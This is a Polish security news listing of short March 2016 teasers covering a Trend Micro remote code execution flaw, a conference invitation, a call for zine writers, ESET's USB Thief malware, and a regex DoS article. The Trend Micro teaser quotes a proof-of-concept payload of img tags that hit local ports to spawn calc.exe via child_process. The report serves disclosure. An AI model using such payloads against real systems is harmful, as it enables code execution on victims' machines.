Dlaczego hackowanie aplikacji webowych jest proste? Zapisz się na darmowe szkolenie od sekuraka.

W biegu

Trend Micro Maximum Security – można wykonywać kod w OS na komputerze ofiary… szybko patchujcie

31 marca 2016, 11:46 | W biegu | 1 komentarz

Tavis – rozwalacz antywirusów – Ormandy tym razem tak napisał o trzech produktach Trend Micro: Frankly, the issue is already ridiculously easy to discover and exploit though. Tym razem chodzi o wykonanie kodu na komputerze ofiary, poprzez…odwiedzenie takiego obrazka: <img src=”http://localhost:40000/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) <img src=”http://localhost:40001/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) <img src=”http://localhost:40002/json/new/?javascript:require(’child_process’).spawnSync(’calc.exe’) Podatne produkty: * Trend Micro…

Czytaj dalej »

Zapraszamy na Cybersec w Warszawie

30 marca 2016, 12:50 | W biegu | 0 komentarzy

TL;DR – zapraszamy na konferencję CybersecPL (8 kwietnia, Warszawa) – w kuluarach będzie można wygrać koszulki sekuraka, gadgety burpa (np. mini-latarki) i ogólnie pogadać z naszą ekipą. Sam organizator – Instytut Kościuszki – pisze o wydarzeniu tak: 8 kwietnia w Warszawie odbędzie się I Polskie Forum Cyberbezpieczeństwa – coroczna konferencja…

Czytaj dalej »

Zarabiaj pieniądze, bądź sławny i wesprzyj społeczność IT security w Polsce

30 marca 2016, 11:20 | W biegu | komentarzy 9

…pod tym enigmatycznym tytułem chciałbym zaprosić wszystkich umiejących pisać ;)  do współpracy przy sekurak zinie. Do tej pory mamy wydane 2 numery (> 120 stron!) naszego bezpłatnego magazynu. Kolejny numer chcemy utrzymać w dotychczasowej konwencji (bezpłatny, ładnie wydany, dostępny na platformy mobilne). Jeśli czujesz się na siłach napisać coś sensownego…

Czytaj dalej »

USB Thief – niewidzialny, wykradający dane malware na USB

25 marca 2016, 10:00 | W biegu | 0 komentarzy

Badacze z firmy ESET, opublikowali niedawno ciekawe opracowanie dotyczące malware o roboczej nazwie USB Thief.  Całość rospowszechnia się z wykorzystaniem odpowiednio przygotowanych pendrajwów i co interesujące, wykradzione z ofiary dane są szyfrowane na wpiętym USB (tym samym z którego rozpoczyna się infekcja). Po jego wyjęciu z komputera nie ma żadnych śladów…

Czytaj dalej »

Nowy „Programista” już w kioskach. Nasz wkład – tekst o DoS przez REGEX

24 marca 2016, 20:36 | W biegu | 0 komentarzy

Przewodni artykuł najnowszego wydania „Programisty” to „CQRS pragmatycznie” – poruszający problem bardzo popularny w środowiskach stosujących MVC i wzorce pochodne. Dlaczego mapowanie jedna klasa – jedna tabela jest poniekąd wypaczeniem tego, jak powinien wyglądać prawdziwy model? Tego można dowiedzieć się z artykułu Macieja Aniserowicza, który wyjaśnia, w jaki sposób zastosować…

Czytaj dalej »